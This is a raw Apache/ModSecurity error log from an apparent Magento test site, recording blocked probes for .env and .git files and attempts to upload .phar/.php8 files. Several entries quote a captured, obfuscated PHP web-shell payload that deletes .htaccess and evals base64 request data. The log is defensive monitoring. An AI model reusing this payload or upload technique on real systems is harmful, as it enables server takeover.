[Wed Dec 24 09:32:54.541370 2025] [:error] [pid 942140] [client 139.59.136.184:34370] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUulNoFODG4IWi8uxa11PAAAAAs"]
[Wed Dec 24 09:32:55.542208 2025] [:error] [pid 942137] [client 139.59.136.184:34382] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUulN1z848j8rVCtVZepegAAAAg"]
[Wed Dec 24 09:32:55.542441 2025] [:error] [pid 942137] [client 139.59.136.184:34382] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUulN1z848j8rVCtVZepegAAAAg"]
[Wed Dec 24 09:32:55.542596 2025] [:error] [pid 942137] [client 139.59.136.184:34382] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUulN1z848j8rVCtVZepegAAAAg"]
[Wed Dec 24 09:32:57.541576 2025] [:error] [pid 942101] [client 139.59.136.184:34392] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUulOY3b3LRkWYPRjITTxAAAAAI"]
[Wed Dec 24 09:32:57.541793 2025] [:error] [pid 942101] [client 139.59.136.184:34392] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUulOY3b3LRkWYPRjITTxAAAAAI"]
[Wed Dec 24 09:32:57.541964 2025] [:error] [pid 942101] [client 139.59.136.184:34392] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUulOY3b3LRkWYPRjITTxAAAAAI"]
[Wed Dec 24 16:04:17.992123 2025] [:error] [pid 944506] [client 91.84.106.190:44166] [client 91.84.106.190] ModSecurity: Rule 7ff866bb7be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/d/ed88364f428d25.phar"] [unique_id "aUwA8UdGcMI4QBzDF13FFgAAABA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 24 16:04:17.992603 2025] [:error] [pid 944506] [client 91.84.106.190:44166] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/d/ed88364f428d25.phar"] [unique_id "aUwA8UdGcMI4QBzDF13FFgAAABA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 24 16:04:17.995017 2025] [:error] [pid 944506] [client 91.84.106.190:44166] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/d/ed88364f428d25.phar"] [unique_id "aUwA8UdGcMI4QBzDF13FFgAAABA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 24 16:04:17.995198 2025] [:error] [pid 944506] [client 91.84.106.190:44166] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/d/ed88364f428d25.phar"] [unique_id "aUwA8UdGcMI4QBzDF13FFgAAABA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 24 16:04:18.273746 2025] [:error] [pid 944506] [client 91.84.106.190:44166] [client 91.84.106.190] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: ed88364f428d25.php8 found within FILES:custom_attributes[country_id]: ed88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUwA8kdGcMI4QBzDF13FFwAAABA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/e/d/ed88364f428d25.phar
[Wed Dec 24 16:04:18.274403 2025] [:error] [pid 944506] [client 91.84.106.190:44166] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUwA8kdGcMI4QBzDF13FFwAAABA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/e/d/ed88364f428d25.phar
[Wed Dec 24 16:04:18.274572 2025] [:error] [pid 944506] [client 91.84.106.190:44166] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUwA8kdGcMI4QBzDF13FFwAAABA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/e/d/ed88364f428d25.phar
[Wed Dec 24 16:04:23.296661 2025] [:error] [pid 942141] [client 91.84.106.190:45848] [client 91.84.106.190] ModSecurity: Rule 7ff866bb7be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/d/ed88364f428d25.php8"] [unique_id "aUwA94Paxlhb2LXaeAEALgAAAAw"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 24 16:04:23.297150 2025] [:error] [pid 942141] [client 91.84.106.190:45848] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/d/ed88364f428d25.php8"] [unique_id "aUwA94Paxlhb2LXaeAEALgAAAAw"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 24 16:04:23.299897 2025] [:error] [pid 942141] [client 91.84.106.190:45848] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/d/ed88364f428d25.php8"] [unique_id "aUwA94Paxlhb2LXaeAEALgAAAAw"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 24 16:04:23.300087 2025] [:error] [pid 942141] [client 91.84.106.190:45848] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/d/ed88364f428d25.php8"] [unique_id "aUwA94Paxlhb2LXaeAEALgAAAAw"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 25 12:10:14.243012 2025] [:error] [pid 964236] [client 91.84.106.190:36814] [client 91.84.106.190] ModSecurity: Rule 7f4a66a18be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/r/tr88364f428d25.phar"] [unique_id "aU0blvgeRVizyCHBwqZXlQAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 25 12:10:14.243507 2025] [:error] [pid 964236] [client 91.84.106.190:36814] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/r/tr88364f428d25.phar"] [unique_id "aU0blvgeRVizyCHBwqZXlQAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 25 12:10:14.245879 2025] [:error] [pid 964236] [client 91.84.106.190:36814] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/r/tr88364f428d25.phar"] [unique_id "aU0blvgeRVizyCHBwqZXlQAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 25 12:10:14.246061 2025] [:error] [pid 964236] [client 91.84.106.190:36814] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/r/tr88364f428d25.phar"] [unique_id "aU0blvgeRVizyCHBwqZXlQAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 25 12:10:14.815561 2025] [:error] [pid 964236] [client 91.84.106.190:36814] [client 91.84.106.190] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: tr88364f428d25.php8 found within FILES:custom_attributes[country_id]: tr88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aU0blvgeRVizyCHBwqZXlgAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/t/r/tr88364f428d25.phar
[Thu Dec 25 12:10:14.816212 2025] [:error] [pid 964236] [client 91.84.106.190:36814] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aU0blvgeRVizyCHBwqZXlgAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/t/r/tr88364f428d25.phar
[Thu Dec 25 12:10:14.816405 2025] [:error] [pid 964236] [client 91.84.106.190:36814] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aU0blvgeRVizyCHBwqZXlgAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/t/r/tr88364f428d25.phar
[Thu Dec 25 12:10:15.065168 2025] [:error] [pid 964236] [client 91.84.106.190:36814] [client 91.84.106.190] ModSecurity: Rule 7f4a66a18be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/r/tr88364f428d25.php8"] [unique_id "aU0bl_geRVizyCHBwqZXlwAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 25 12:10:15.065633 2025] [:error] [pid 964236] [client 91.84.106.190:36814] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/r/tr88364f428d25.php8"] [unique_id "aU0bl_geRVizyCHBwqZXlwAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 25 12:10:15.068434 2025] [:error] [pid 964236] [client 91.84.106.190:36814] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/r/tr88364f428d25.php8"] [unique_id "aU0bl_geRVizyCHBwqZXlwAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 25 12:10:15.068606 2025] [:error] [pid 964236] [client 91.84.106.190:36814] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/r/tr88364f428d25.php8"] [unique_id "aU0bl_geRVizyCHBwqZXlwAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 26 05:58:26.131663 2025] [authz_core:error] [pid 987018] [client 157.230.19.140:35174] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Dec 26 05:58:29.147171 2025] [:error] [pid 987021] [client 157.230.19.140:35198] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aU4V9QALvSk8syxFzC_TCgAAAAU"]
[Fri Dec 26 05:58:29.147396 2025] [:error] [pid 987021] [client 157.230.19.140:35198] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aU4V9QALvSk8syxFzC_TCgAAAAU"]
[Fri Dec 26 05:58:29.147544 2025] [:error] [pid 987021] [client 157.230.19.140:35198] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aU4V9QALvSk8syxFzC_TCgAAAAU"]
[Fri Dec 26 05:58:30.148388 2025] [:error] [pid 987016] [client 157.230.19.140:35200] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU4V9vtV0DSD9Vsv4Ep7NAAAAAE"]
[Fri Dec 26 05:58:30.148620 2025] [:error] [pid 987016] [client 157.230.19.140:35200] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU4V9vtV0DSD9Vsv4Ep7NAAAAAE"]
